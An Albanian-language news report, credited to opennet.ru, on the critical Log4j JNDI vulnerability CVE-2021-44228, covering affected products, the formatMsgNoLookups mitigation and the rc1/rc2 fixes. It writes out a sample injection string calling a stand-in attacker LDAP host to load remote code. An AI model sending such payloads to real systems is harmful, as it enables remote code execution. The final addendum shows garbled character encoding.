Në Apache Log4j, një framework i njohur për menaxhimin e log-eve në aplikacionet Java, është zbuluar një vulnerabilitet kritik që lejon ekzekutimin e kodit të përgjithshëm gjatë regjistrimit të një vlere të formatuar në formatin "{jndi:URL}". Sulmi mund të kryhet ndaj aplikacioneve Java që regjistrojnë vlera të marra nga burime të jashtme, për shembull, kur paraqiten vlerat problematike në mesazhet e gabimeve.
Vërehet se problemi prek pothuajse të gjitha projektet që përdorin framework-e si Apache Struts, Apache Solr, Apache Druid ose Apache Flink, duke përfshirë Steam, Apple iCloud, klientët dhe serverët e lojës Minecraft. Pritet që vulnerabiliteti të shkaktojë një valë sulmesh masive ndaj aplikacioneve korporative, duke përsëritur historinë e vulnerabiliteteve kritike në framework-un Apache Struts, i cili sipas vlerësimeve përdoret në aplikacionet web nga 65% e kompanive në listën Fortune 100. Gjithashtu, janë regjistruar përpjekje për skanim të rrjetit për sisteme të prekura.
Problemi përkeqësohet nga fakti që është publikuar një exploit punues, por korrigjimet për degët stabile deri tani nuk janë formuluar. Identifikuesi CVE nuk është dhënë ende. Korrektimi është përfshirë vetëm në degën testuese log4j-2.15.0-rc1. Si një zgjidhje për bllokimin e vulnerabilitetit, rekomandohet të vendoset parametrin log4j2.formatMsgNoLookups në vlerën true.
Problemi ishte shkaktuar nga fakti se log4j mbështet trajtimin e maskave speciale "{}" në stringjet e regjistruara, në të cilat mund të ekzekutohen kërkesa JNDI (Java Naming and Directory Interface). Sulmi përfshin dërgimin e një stringu me zëvendësim "${jndi:ldap://attacker.com/a}", me procesimin e të cilit log4j do të dërgojë një kërkesë LDAP në server attacker.com për rrugën e klasës Java. Rruga e kthyer serverin e sulmuesit (p.sh., http://second-stage.attacker.com/Exploit.class) do të ngarkohet dhe ekzekutohet në kontekstin e procesit aktual, duke lejuar sulmuesin të arrijë ekzekutimin e kodit të përgjithshëm në sistem me të drejtat e aplikacionit aktual.
Shtesa 1: Vulnerabilitetit i është dhënë identifikuesi CVE-2021-44228.
Shtesa 2: ĂshtĂ« zbuluar njĂ« mĂ«nyrĂ« pĂ«r tĂ« anashkaluar mbrojtjen e shtuar nga rilansimi log4j-2.15.0-rc1. ĂshtĂ« propozuar njĂ« pĂ«rditĂ«sim i ri log4j-2.15.0-rc2 me mbrojtje mĂ« tĂ« plotĂ« kundĂ«r vulnerabilitetit. NĂ« kod evidentohet ndryshimi i lidhur me mungesĂ«n e mbylljes fatkeqe nĂ« rastin e pĂ«rdorimit tĂ« njĂ« URL JNDI tĂ« formatuar gabim.
Burimi: opennet.ru
